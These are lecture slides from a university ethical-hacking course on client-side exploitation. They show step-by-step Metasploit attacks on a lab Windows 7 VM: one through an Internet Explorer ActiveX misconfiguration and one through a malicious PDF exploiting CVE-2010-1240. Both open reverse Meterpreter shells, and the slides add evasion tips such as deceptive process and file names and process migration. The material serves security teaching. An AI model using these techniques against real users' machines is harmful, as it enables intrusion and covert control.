INFO3002 Ethical Hacking Principles and Practice

Lecture 7B: Client Side Exploitation

School of Computer, Data and Mathematical Sciences

Western Sydney University
1
Lecture outline
■ What is Client Side Exploitation
■ Browser Exploitation
■ PDF Reader Exploitation

2
Lecture outline
■ What is Client Side Exploitation
■ Browser Exploitation
■ PDF Reader Exploitation

3
Recall: Client/Server Architecture
■ Many services on the Internet are provided via the
client/server architecture.

■ Previously, we looked at the exploitation on vulns in server

software: SMB server, FTP server, etc.
■ The client software can have vulns as well!
4
Client Side Exploitation
■ Exploiting the vulns in client software such as browsers,
email clients, etc. The attacks are performed typically by
▬ creating a malicious server
▬ or making a vulnerable server malicious for the clients to connect
▬ or generating malicious files for the clients to open.

■ Client side exploitation is on the rise

▬ Servers are usually tightly protected today, but personal computers
are not.
▬ There are a huge number of personal computers.

5
Social Engineering
■ In addition to the techniques of creating malicious servers
or files, an important step in client side exploitation is to
trick users to connect to malicious servers or open
malicious files.
▬ This step is typically performed by Social Engineering.

■ In the context of information security, Social Engineering

means those social or psychological techniques that
manipulate people into performing unwise actions.
▬ Mainly uses psychological or social techniques, not computer
techniques.

6
Social Engineering Examples
■ Littering some USB sticks containing malicious files
around the locations of targets.
■ Enticing people to click a malicious link by disguising the
link as a link for gift, voucher, etc.
■ Sending emails that appear to come from boss,
government, police, etc.

7
Assumption
■ In this lecture, we'll assume the social engineering step is
successful.
▬ That is, a user has been successfully lured to connect to a malicious
server or open a malicious file.

■ Social engineering itself is a big topic. If you are

interested, you can refer to the following Wikipedia page
and its linked pages:
▬ https://en.wikipedia.org/wiki/Social_engineering_(security)

■ This lecture will focus on:

▬ How to create a malicious server or file.

8
Types of Client Side Exploitation
■ One typical classification of client side exploitation is based
on the client software exploited:
▬ Browser exploitation
▬ Email client exploitation
▬ PDF Reader exploitation
▬ MS Office exploitation
▬ And much more

We'll talk about two types in this lecture: Browser exploitation and
PDF Reader exploitation

9
Lecture outline
■ What is Client Side Exploitation
■ Browser Exploitation
■ PDF Reader Exploitation

10
Browser exploitation – Overview
■ First, create a web page containing malicious Javascript,
or other type of code that will be run by browsers.
■ Then, lure users to visit this web page.
■ The malicious code will exploit certain vuln in the
browsers to gain unauthorized access to the user
computer.

11
Browser exploitation – Example
■ In this example, we'll exploit a misconfiguration in IE
browser.
▬ This misconfiguration allows remote code execution if a user views a
specially crafted Web page.
▬ A misconfiguration is not a vulnerability, but it can be as deadly as a
vulnerability.

■ This misconfiguration is to set the 'Initialize and script

ActiveX controls not marked as safe' setting in IE to
'Enabled'.
▬ Here ‘script’ is a verb.
▬ In Internet Explorer, click Tools -> Internet Options -> Security ->
Custom Level -> Initialize and script ActiveX controls not marked as
safe -> Enable.
▬ We have done this in the IE on our Win7 VM.
12
Browser exploitation example (cntd)
■ We need to start MSF first.
▬ sudo service postgresql start
▬ sudo msfconsole
NB: 'sudo' is necessary, otherwise you don't have the full functionality
of msfconsole such as binding to certain port numbers.

■ Next, we'll demo the 8 steps of using MSF to exploit this

misconfiguration.

13
Step 1. Search for the exploit
■ Suppose we know that our target is using an IE browser
with this misconfiguration.
■ We search the exploit for this in MSF:

14
Step 2. Select the exploit
■ Suppose we select the exploit with Index 0 from the
returned results.

■ NB:
▬ the payload defaults to windows/meterpreter/reverse_tcp.
▬ 'windows/meterpreter/reverse_tcp' is applicable to both 32-bit and 64-
bit architectures, while 'windows/x64/meterpreter/reverse_tcp' is only
applicable to 64-bit architecture.

15
Step 3. Set payload
■ Since we know our Win7 VM uses a 64-bit OS, it is better to
set payload to 'windows/x64/meterpreter/reverse_tcp',
which is more reliable in our scenario.

16
Step 4. Show exploit and payload options

17
Step 5. Set options
Different from server side exploitations, we encounter the following
new options:

■ SRVHOST: in case the attacking computer has several network

interfaces, this option specifies on which network interface the
malicious web server to set up will listen.
▬ Its default value '0.0.0.0' means the web server will listen on all interfaces
of the computer. You can keep this default untouched.
▬ Recall that in the output of Linux command ‘ss’, the ‘0.0.0.0:80’ also means
that a program is listening at port 80 on all IP addresses of this computer.

■ SRVPORT: the port number the malicious web server will listen
on.
▬ Its default is 8080.
▬ To make this port number not suspicious, it's better to set it to 80.
18
Step 5. Set options (cntd)
■ URIPATH: the path part of the malicious URI (or URL) to
send to target.
▬ That is, the part after the host name in URL.
▬ Its default value is random, meaning a random path name will be
created.
▬ To effectively entice our target, it is better to give an enticing name such
as 'freegift', 'prize', etc.

■ ALLOWPROMPT: allow the IE browser to prompt users

before executing potentially harmful javascript.
▬ Its default is 'false'.
▬ We need to set it to 'true' here, otherwise the attack won't succeed.

19
Step 5. Set options (cntd)

Recall: LHOST and LPORT are the IP address and port number for the
reverse Meterpreter to connect back. Since their default values are set
properly (LHOST being the IP of Kali and LPORT being 4444) by
msfconsole as shown in Step 4, we don't need to modify them here.

20
Step 6. Launch the attack
■ Simply enter 'exploit'
▬ The web server will start listening on port 80 to serve the malicious
page: http://192.168.76.129/prize
▬ The Meterpreter handler will start listening on port 4444.

21
Step 7. Our target clicks the malicious link
■ Suppose an innocent user at Win7 clicks this malicious link.

■ And click the 'Allow' button in the subsequent Dialogue Box if

prompted by IE.
■ Check the progress at Kali VM while the IE browser is
thinking.

22
Step 8. MSF starts to exploit; and a
Meterpreter session is opened

■ After the Meterpreter session is opened, you should enter 'sessions -i

<session number>' to access that session.

■ NB: If a Meterpreter session is not opened, you can simply enter 'sessions'
to check.
23
Summary to the previous exploitation
■ If you do 'sudo ss -antp' at Kali, you'll see that Kali has both port 80
and port 4444 listening.

Kali Machine Target Machine

HTTP
Malicious connection
Web Server Browser
at port 80

Meterpreter
connection
Meterpreter Meterpreter
Hander at payload
port 4444

24
Notes to the previous exploitation
■ Meterpreter will acquire the same privilege as IE, as it is
injected into the target through IE.
▬ If the target logs in with an administrator account, IE will have
administrator privilege. If with a limited user account, IE will only have
limited privilege.
o This is why people should login to their computers with limited user
accounts instead of administrator accounts.

■ In this example, the target logs into Win7 as 'alex' and runs
IE, so the meterpreter will have the same privilege of 'alex'.

25
Refinement to the previous exploitation
■ If you do 'getpid' and then 'ps' in the meterpreter session obtained
previously, you'll see:

■ So the meterpreter created a new process with name

'IQtverm…exe' and PID '3656'. This is not very secretive.
26
Refinement to exploitation (cntd)
■ To remove this process, a skilled hacker will migrate Meterpreter to
another process immediately after the exploitation of IE is
successful.
■ To achieve this, the hacker will set the following advanced options
of the Meterpreter payload in Step 5. Advanced options can be
displayed by 'show advanced'.
▬ PrependMigrate: whether to migrate Meterpreter to a new process
▬ PrependMigrateProc: the name of the new process to migrate to

Choosing 'explorer.exe' (File Explorer) is safe, as it is

always running for a logged-in user
27
Result of the refinement
■ Meterpreter will migrate to explorer.exe.
■ The explorer.exe to which the Meterpreter migrates is newly
created, so you'll see two explorer.exe processes.
meterpreter > getpid
Current pid: 2112

meterpreter > ps -S explorer

PID PPID Name User Path
2112 1348 explorer.exe alex C:\Windows\SysWOW64\explorer.exe
2576 2536 explorer.exe alex C:\Windows\explorer.exe

■ The other one with a different PID 2576 is the true

explorer.exe process.

28
 Further refinement
■ You can manually migrate Meterpreter to the true
explorer.exe after you get the Meterpreter session. Then,
the fake explorer.exe in the previous slide will disappear.
meterpreter > migrate 2576
[*] Migrating from 2112 to 2576...
[*] Migration completed successfully.

meterpreter > ps -S explorer

PID PPID Name User Path
2576 2536 explorer.exe alex C:\Windows\explorer.exe

29
Lecture outline
■ What is Client Side Exploitation
■ Browser Exploitation
■ PDF Reader Exploitation

30
PDF Reader exploitation – Overview
■ Create a PDF file containing malicious code.
■ Users are lured to open this PDF file.
■ The malicious code inside the PDF file will exploit certain
vuln in the PDF reader to gain unauthorized access to the
user computer.

31
PDF Reader exploitation – Example
■ In this example, we'll exploit a vuln in Adobe Reader before
v9.3.3.
▬ This vuln is because of no sanitization on one text field in the Launch
File dialog, which enables attackers to trick users into executing an
arbitrary local program specified in a PDF document.
▬ CVE ID: CVE-2010-1240.
▬ For more info about this vuln, see:
https://www.cvedetails.com/cve/CVE-2010-1240/

■ Next, we'll demo the 10 steps of using MSF to exploit this

vuln.

32
Step 1. Search for the exploit
■ Suppose we know that our Win7 VM is using Adobe
Reader v9.2.
■ We search the exploit for it by using the CVE ID:

33
Step 2. Select the exploit
■ Our experience suggests that the exploit with index 1 has a
larger chance to succeed, so we'll select it in our demo.

■ NB:
▬ the payload defaults to windows/meterpreter/reverse_tcp.
▬ 'windows/meterpreter/reverse_tcp' is applicable to both 32-bit and 64-
bit architectures, while 'windows/x64/meterpreter/reverse_tcp' is only
applicable to 64-bit architecture.

34
Step 3. Set payload
■ Since we know our Win7 VM uses a 64-bit OS, it is better to
set payload to 'windows/x64/meterpreter/reverse_tcp',
which is more reliable in our scenario.
msf6 > set payload windows/x64/meterpreter/reverse_tcp
payload <= windows/x64/meterpreter/reverse_tcp

35
Step 4. Show exploit and payload options

36
Step 5. Set options
■ EXENAME: the name of the meterpreter process shown in the
target.
▬ A hacker will choose a deceptive name rather than its default value. E.g.,
iexplorer.exe, svchost.exe, etc are all good choices.

■ FILENAME: the name of the malicious pdf file to be generated.

▬ A hacker will choose an attractive name rather than its default value. E.g.,
payslip.pdf, voucher.pdf, etc are all good choices.

■ LAUNCH_MESSAGE: the message to be prompted before a user

opens this pdf file.
▬ We accept its default value here.

37
Step 6. Generate the malicious file
■ Simply enter 'exploit' or 'run'
▬ 'run' is an alias for 'exploit'.
▬ The malicious pdf file named voucher.pdf will be generated.

38
Step 7. Create a handler to receive the
reverse Meterpreter connection
■ This is done through the module exploit/multi/handler.
▬ This module with proper payloads can create handlers (servers) to wait
for connection requests from Meterpreter sessions, shell sessions, http
sessions, etc.

■ We need to use this module as follows:

■ See the next slide on how to set its payload and options.

39
Step 7. Create a handler to receive the
reverse Meterpreter connection (cont'd)
■ Usually we cannot accept its default payload.
■ We need to set the handler's payload and options exactly the same
as those when we generate the malicious pdf.
■ Then, we start this handler to wait for meterpreter's reverse
connections.

40
Note to Step 7

■ This step is simply to create a Meterpreter handler to receive

the reverse connection.
■ This step is not needed in the previous example of Browser
exploitation, as the handler creation is automatically done by
the exploit module there.
■ Here the adobe_pdf_embedded_exe_nojs module doesn't do
this for us, so we need to create this Meterpreter handler
ourselves.

41
Step 8. Send the pdf file to the target
■ Suppose we use certain social engineering technique such
that the target downloads the voucher.pdf to his/her
"Documents" directory.
■ In our lab, we can use nc to upload voucher.pdf from Kali to
Win7.
■ Since voucher.pdf is stored in the directory /root/.msf4/local/
and this directory requires root privilege to access, we need
to get a linux shell under root account first.
■ This can be done by the 'sudo zsh' command, where 'zsh' is
the default shell program of Kali Linux.
▬ See the screenshot in the next slide.

42
Step 8. Send the pdf file to the target
(cntd)
A shell under root
is obtained.
A root shell has
the prompt symbol
'#'.

Then, you can

change to the
/root/.msf4/local
directory.

Then, you can use

nc to upload the
voucher.pdf to the
target's
Documents folder.

43
Step 9. Target opens this malicious file
■ Adobe Reader will prompt user to confirm 'Open'. Here we assume
that the user fully trusts this file and will open it.

44
Step 9. Target opens this file (cntd)
■ After the user clicks the 'Open' button, the Meterpreter
payload embedded in the pdf will be run, and it initiates a
connection to the waiting handler at Kali.
■ NB: Adobe Reader will show a blank pdf. If you want to
generate a pdf with some contents, it can be achieved by
using the advanced options of the
adobe_pdf_embedded_exe_nojs module. You are welcome
to explore this one by yourself.

45
Step 10. At Kali, the Meterpreter handler
receives the connection
■ The Meterpreter connects back to the handler at Kali, thus a
Meterpreter shell is successfully obtained.

46
Step 10. At Kali, the Meterpreter handler
receives the connection (cntd)
■ We can check the user account, process id, process name, etc.

■ We see that the process name is indeed the one we have specified:
iexplorer.exe.

47
Defence to client-side exploitation

■ Don't click suspicious links or open suspicious files.

■ Update your software to use latest version.
■ Install anti-virus software.

48
Example Short Answer Question:
■ What is social engineering? Also, give some examples of
social engineering.

49
Lecture Summary
■ Netcat is a lightweight multi-purpose networking tool,
nicknamed ‘Swiss Army Knife’.
■ Client-side attacks are very popular today, because client-
side programs are used by everybody.
■ MSF can easily succeed in client-side attacks if client-side
programs are not well protected.

50
References
■ Online Tutorial from Offensive Security: Metasploit
Unleashed
▬ https://www.offensive-security.com/metasploit-unleashed/

■ The web links mentioned in the slides of this lecture

51